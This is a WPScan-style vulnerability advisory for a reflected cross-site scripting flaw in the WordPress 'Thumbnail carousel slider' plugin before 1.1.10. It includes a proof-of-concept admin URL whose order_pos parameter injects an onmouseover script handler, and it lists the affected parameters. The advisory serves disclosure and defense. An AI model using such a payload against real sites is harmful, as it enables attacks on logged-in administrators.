Lucene search

K
wpvulndbChien VuongWPVDB-ID:0487C3F6-1A3C-4089-A614-15138F52F69B
HistoryApr 18, 2023 - 12:00 a.m.

Thumbnail carousel slider < 1.1.10 - Reflected XSS

2023-04-1800:00:00
Chien Vuong
wpscan.com
10
plugin
xss
sanitisation
output
administration
parameters
poc
vulnerability
wordpress

EPSS

0.001

Percentile

31.0%

The plugin does not sanitise and escape some parameters before outputting them back in pages, leading to Reflected Cross-Site Scripting vulnerability which could be used against high privilege users such as admin.

PoC

Make a logged in admin open: GET /wp-admin/admin.php?page=responsive_thumbnail_slider_image_management&order;_by=title&order;_pos=uqxt1%22%20onmouseover%3dalert(1)%20style%3dposition%3aabsolute%3bwidth%3a100%25%3bheight%3a100%25%3btop%3a0%3bleft%3a0%3b%20cxz0m Affected parameters: order_by, order_pos, and search_term

EPSS

0.001

Percentile

31.0%

Related for WPVDB-ID:0487C3F6-1A3C-4089-A614-15138F52F69B